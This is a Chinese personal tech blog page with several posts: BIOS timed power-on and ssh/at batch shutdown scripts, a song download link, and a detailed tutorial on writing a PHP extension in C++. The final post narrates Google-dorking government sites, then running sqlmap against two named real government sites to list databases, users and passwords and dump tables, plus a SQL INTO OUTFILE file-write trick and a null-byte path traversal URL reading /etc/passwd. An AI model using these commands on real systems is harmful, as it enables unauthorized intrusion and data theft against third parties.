一、定时开机设置方法


1、设置电脑定时开机,开机启动后,按DEL,进入BIOS,然后选中 "POWER" 在电源窗口中找到"RESTORE ON AC/POWER LOSS"项,回车,然后通过方向键设置其值为"POWER ON"。
2、选中"RESUME ON RTC ALARM"并按回车,接着通过方向键设置其值为"ENABLE"
3、选中"RTC ALARM DATE"按回车依次设置即可
4、按F10保存重启

二、定时关机方法

      一般可能就用crontab来解决,但如果哪天突然某个机器临时不关呢,那么去掉crontab,再设置不是很麻烦,所以,我采用at设置任务。思路是这样,我在一台主机如50.71上设置crontab,每天早上给所有机器下达18:00关机任务。这里如果是批量操作所有机器就设计到一个远程的问题,就采用 ssh等价性来做,操作如下

1、在主机50.71的.ssh目录中生成登陆其他50.*主机的sshkey:ssh-keygen -t dsa #一直回车到底
2、把id_dsa.pub拷贝到其余所有机器的 .ssh目录下,如果没有目录则创建:mkdir .ssh; chmod 600 .ssh; cd .ssh/
3、同时在该目录生成cat id_dsa.pub > authorized_keys;
4、给两个key附权限:chmod 600 id_dsa.pub; chmod 600 authorized_keys

每天建立at任务的shell脚本如下

#!/bin/bash
for i in `cat server_list.txt`;  do
    if [ `expr substr $i 1 1` == "#" ]; then
        continue;
    fi
    echo "[`date '+%Y-%m-%d %H:%M:%S'`] start set:$i";
    ssh -tt $i << EOF
echo "init 0" | at "19:00";
at -l;
exit;
EOF
done

今天又碰到时间提前了8个小时的问题,是时区的问题,首先,修改时区:cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
修改了还是没有变化,还是装个ntp软件吧,使用 ntpdate 210.167.182.10直接同步时间即可

      好久没有新歌发布了,今天终于出来了,许嵩2013新专辑首支主打歌曲《小烦恼没什么大不了》
下载地址:http://www.mjix.com/download/xiaofannao.mp3

无标签信息 0 条
19 / 04 / 2013 buling

      终于有机会写c++了,虽然现在还是摸着石头过河,但是能过河说明就再实践了,之前写了,python、java对c++的调用,和c++的动态链接库的创建,终于轮到写php对c++的调用了,这里不是单纯的helloworld,而是在ace基础上封装类,本文主要说c++开发php扩展的基本方法和php扩展类的创建方法,已经如何引用第三方库。
      因为php官方提供的示例是以c开发为基础,所以相对c++开发的资料还是有点难找,下面进入正题

一、c++扩展开发步骤

1、down一份php的源码,如我的php是5.3.3,我就down了一份php5.3.3的源码
2、解压进入ext目录下,执行:./ext_skel –extname=AceClient。我建的是一个名为aceclient的模块
3、按照提示应该是修改 config.m4,因为是c++所以需要这样

//1、找到以下三句类似代码去除前面的dnl(注释符)
PHP_ARG_WITH(AceClient, for AceClient support,
Make sure that the comment is aligned:
[ --with-AceClient Include AceClient support])
//2、在if test "$PHP_ACECLIENT" != "no"; then这句判断内加入如下代码
PHP_REQUIRE_CXX() #告诉它用c++来编译
PHP_ADD_LIBRARY(stdc++, "", EXTRA_LDFLAGS)
EXTRA_LDFLAGS="$EXTRA_LDFLAGS -lACE" #需要引入的第三方模块ACE
CPPFILE="AceClient.cpp ace_client.cpp" #需要编译的cpp文件集合
PHP_NEW_EXTENSION(AceClient, $CPPFILE, $ext_shared)

2、更改php_AceClient.h,找到#ifdef ZTS,#include “TSRM.h”,#endif这三句前后加代码

//兼容c代码
extern "C" {
#ifdef ZTS
#include "TSRM.h"
#endif
}

3、把AceClient.c为AceClient.cpp,同样AceClient.cpp中找到#ifdef HAVE_CONFIG_H—#include “ext/standard/info.h”前后加代码

extern "C" {
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include "php.h"
#include "php_ini.h"
#include "ext/standard/info.h"
}

到此,php扩展需要兼容c的代码部分就修改完了

二、c++扩展类开发示例

下面先看需要实现的结果

//$b = get_loaded_extensions(); //可以查看扩展是否加载成功
//var_dump($b);
$a = new AceClient("127.0.0.1", 50050, 200);
var_dump($a);
$ret = $a->send("铃不铃不铃");
var_dump("send:".$ret);
$ret = $a->receive();
var_dump("receive:".$ret);

目前php的官方示例代码是都是提供了函数的开发,所以函数的开发略过,直接讲解类的开发过程,http://devzone.zend.com/1435/wrapping-c-classes-in-a-php-extension/ 这是zend官方的一篇类开发说明文,有点长,抽离了一下主要的部分讲解
1、加载一些需要的文件

#include "php_AceClient.h" //这个是本来就存在的,闲杂不需要放在extern "C"中了
#include "ace_client.h" //这个是业务类代码,目的是为了个语言统一

2、加入我们的业务代码,即新建类,基本是模板,直接改就行:

/****************************extension class***************************/
zend_class_entry *ace_ce;
zend_object_handlers ace_object_handlers;
struct ace_object { //声明个结构体存储业务代码的ace instance对象
    zend_object std;
    Esun_Ace_Client *ace_ins;
};
//创建php的构造函数
PHP_METHOD(Esun_Ace_Client, __construct){
    long port, timeout;
    char *ip; int ip_len;
    Esun_Ace_Client *ecli = NULL;
    zval *object = getThis();
    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sll", &ip, &ip_len, &port, &timeout) == FAILURE) {
        RETURN_NULL();
    }
    ecli = new Esun_Ace_Client(ip, (int)port);
    ace_object *obj = (ace_object *)zend_object_store_get_object(object TSRMLS_CC);
    obj->ace_ins = ecli;
}
//创建ace发送方法
PHP_METHOD(Esun_Ace_Client, send){
    char *data; int data_len, ret = -1;
    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &data, &data_len) == FAILURE) {
        RETURN_NULL();
    }
    Esun_Ace_Client *ecli = NULL;
    ace_object *obj = (ace_object *)zend_object_store_get_object(
        getThis() TSRMLS_CC);
    ecli = obj->ace_ins;
    if (ecli != NULL) {
        ret = ecli->send_data(data);
    }
    RETURN_LONG(ret);
}
//创建php的接收方法
PHP_METHOD(Esun_Ace_Client, receive){
    char *data;
    Esun_Ace_Client *ecli = NULL;
    ace_object *obj = (ace_object *)zend_object_store_get_object(
        getThis() TSRMLS_CC);
    ecli = obj->ace_ins;
    if (ecli != NULL) {
        data = ecli->receive_data();
    }else{
        RETURN_NULL();
    }
    RETURN_STRING(data, strlen(data));
}
//说明php类存在的几个方法
function_entry ace_methods[] = {
    PHP_ME(Esun_Ace_Client,              __construct,  NULL, ZEND_ACC_PUBLIC | ZEND_ACC_CTOR)
    PHP_ME(Esun_Ace_Client,              send,         NULL, ZEND_ACC_PUBLIC)
    PHP_ME(Esun_Ace_Client,              receive,      NULL, ZEND_ACC_PUBLIC)
    {NULL, NULL, NULL}
};
//这基本是模板函数,拷贝,替换一下相关值就行了
void ace_free_storage(void *object TSRMLS_DC){
    ace_object *obj = (ace_object *)object;
    delete obj->ace_ins;
    zend_hash_destroy(obj->std.properties);
    FREE_HASHTABLE(obj->std.properties);
    efree(obj);
}
//一样的模板函数,拷贝,用于创建类对象保存
zend_object_value ace_create_handler(zend_class_entry *type TSRMLS_DC){
    zval *tmp;
    zend_object_value retval;
    ace_object *obj = (ace_object *)emalloc(sizeof(ace_object));
    memset(obj, 0, sizeof(ace_object));
    obj->std.ce = type;
    ALLOC_HASHTABLE(obj->std.properties);
    zend_hash_init(obj->std.properties, 0, NULL, ZVAL_PTR_DTOR, 0);
    zend_hash_copy(obj->std.properties, &type->default_properties,
        (copy_ctor_func_t)zval_add_ref, (void *)&tmp, sizeof(zval *));
    retval.handle = zend_objects_store_put(obj, NULL,
        ace_free_storage, NULL TSRMLS_CC);
    retval.handlers = &ace_object_handlers;
    return retval;
}
/****************************************************************/

3、业务代码就完了,现在只剩下通知PHP_MINIT_FUNCTION(模块初始化需要处理的方法)

PHP_MINIT_FUNCTION(AceClient)
{
    zend_class_entry ce;
    INIT_CLASS_ENTRY(ce, "AceClient", ace_methods); //注册php类并注册相关方法
    ace_ce = zend_register_internal_class(&ce TSRMLS_CC);
    ace_ce->create_object = ace_create_handler;
    memcpy(&ace_object_handlers,
    zend_get_std_object_handlers(), sizeof(zend_object_handlers));
    ace_object_handlers.clone_obj = NULL;
    return SUCCESS;
}

一、编译php的扩展模块AceClient

如果上面就操作完了,接下来的动作就简单多了
1、初始化一下模块的环境,执行 phpize。
2、配置,./configure
3、编译,make
4、如果没有问题的情况下,modules下面应该会出现一个 AceClient.so 模块
5、在php.ini中加载,为了尽可能不改php.ini,所以就加载php.d目录下,vi AceClient.ini;添加:extension=/home/xxx/php-5.3.3/ext/AceClient/modules/AceClient.so
6、重启一下apache,注意看看错误日志,如我出现libACE.so.6.1.7: cannot open shared object file,这是因为第三方库libACE模块在/usr/local/lib下面,所以我就软连了一份到/usr/lib64下面。还有一个错误出现了Backtrace: zend_objects_store_del_ref_by_handle,原来是我在接收port值时忘了加&
7、大功告成,乐你的吧

17 / 04 / 2013 buling

      最近对wooyun、freebuf等网站特别感兴趣,下班时间周末花了很多,上多了wooyun的人应该对sqlmap不陌生,是国外一位大牛写的sql注入神器,地址:http://sqlmap.org ,早想试一试,忙里偷闲就搞一下吧,打开google,搜索:inurl:gov.cn inurl:php?id= //专门搞正腐网站,打开前面几个,加个单引号,很快就发现一个:http://www.tchjbh.gov.cn/news_display.php?id=148
      下面就该sqlmap出场了,:

#我的第一句啊
python sqlmap.py -u {url} -v 2 #-v是debug信息级别
#可以分别取到 isdba、数据库、表列表
python sqlmap.py -u {url} -v 1 --is-dba --dbs --tables
#可以获取到当前用户和密码,但这个网站没有权限读到hash密码
python sqlmap.py -u {url} -v 1 --users --passwords
#类似这样可以执行语句,这样是执行不了的
python sqlmap.py -u {url} -v 2 --sql-query "select * from admin_login" -D tchjbh
#因为下班原因,此文推迟,晚上看电视无聊拿着pad又来注入,这次定向四川正府网站,又是一个 www.scyg.gov.cn/xwgg/zcfg_1.asp?id=86
#下面来看注入,上面用过的代码将不再列举
#查看当前db和当前用户
python sqlmap.py -u {url} --current-db --current-user
#查看db的所有表
python sqlmap.py -u {url} --tables -D xscyg
#查看db的某表的所有列
python sqlmap.py -u {url} --clumns -T sysconstraints -D xscyg
#打印表数据,打印某列可以直接-C指定列名
python sqlmap.py -u {url} --dump -T bgt -D xscyg
#导出数据库的方法
python sqlmap --dump-all -D xscyg

      我拿了两个洞子里做教程,sorry,但因为这两个站的用户都不是dba,也没有太重要的数据,所以就撸过了
发现sqlmap有写入文件的功能,速度研究了一下sql写文件的方法:

//1、需要这个目录可写,一般网站总会有那么一两个目录可写的,当然前提是需要通过爆路径获取到网站的根目录
//不可写一般会出现:ERROR 1 (HY000): Can't create/write to file '/home/oo/sql.php' (Errcode: 13)
//2、如果此文件存在则写不了
//存在文件一般会报:ERROR 1086 (HY000): File '/home/oo/sql.php' already exists
select '' from city_info limit 1 into outfile '/home/xxx/sqltest/sqlx.php';

      中午时间想到了截断漏洞,速度测试一下,效果很明显,且看php代码

$a = isset($_GET['a']) ? $_GET['a'] : 'phpinfo';
$file = dirname(__FILE__);
include $file.'/'.$a.'.php';

下面来构造url代码如下:http://192.168.50.71/~xxx/test.php?a=adsf%2F..%2F../../../etc/passwd%00 效果相当明显,include果断忽视了.php后缀